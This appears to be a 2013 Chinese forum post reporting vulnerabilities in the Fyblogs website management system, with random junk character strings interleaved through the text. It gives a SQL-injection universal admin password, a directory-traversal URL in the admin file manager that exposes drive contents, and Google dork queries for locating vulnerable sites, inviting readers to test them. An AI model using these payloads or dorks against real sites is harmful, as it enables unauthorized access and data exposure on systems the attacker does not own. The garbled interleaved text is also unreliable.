漏洞类型: 未授权访问/权限绕过4 {. J! d) m7 J- W' P
& K: G) Q. ?& ?! c, V3 k
简要描述: a8 F; \, `( G( q$ M% N
6 F4 e* L# g, D
Fyblogs网站管理系统,,后台存在万能密码,后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!
6 k6 ~; S4 l4 n; [8 l- E- }" q6 S, e% r( Y x
详细说明:
& e! Y( z. e1 R" t7 v; F% x# d; [7 D4 R0 {. t9 K0 I
后台万能密码 'or'='or'
, K3 r( C# i# G( I4 E E! d后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!* l, v$ p) n, Z/ F, \$ s' U
admin/uploadfile.asp?currentFolder=/upfiles/../0 ?4 d* d0 M N. ^' [5 H
* N, h( i3 t; d0 }( X
漏洞证明:
0 r' o3 m, F% u- u2 R& R$ y* W- B4 n4 {9 x
谷歌:inurl:type.asp?id=1 新闻中心
7 E$ J; P8 e* w0 p. r" h3 y或者 :inurl:download_ok.asp?2 |' K) H$ V% U8 O
6 N# S$ r, a, `8 h1 n9 s8 V( U
可以测试
, M( j# N# t0 m: G- {
: h4 @/ W% h, w
7 f4 K( U5 m2 x9 w6 j- b |
发表于 2013-3-7 13:07:46
收藏
支持
反对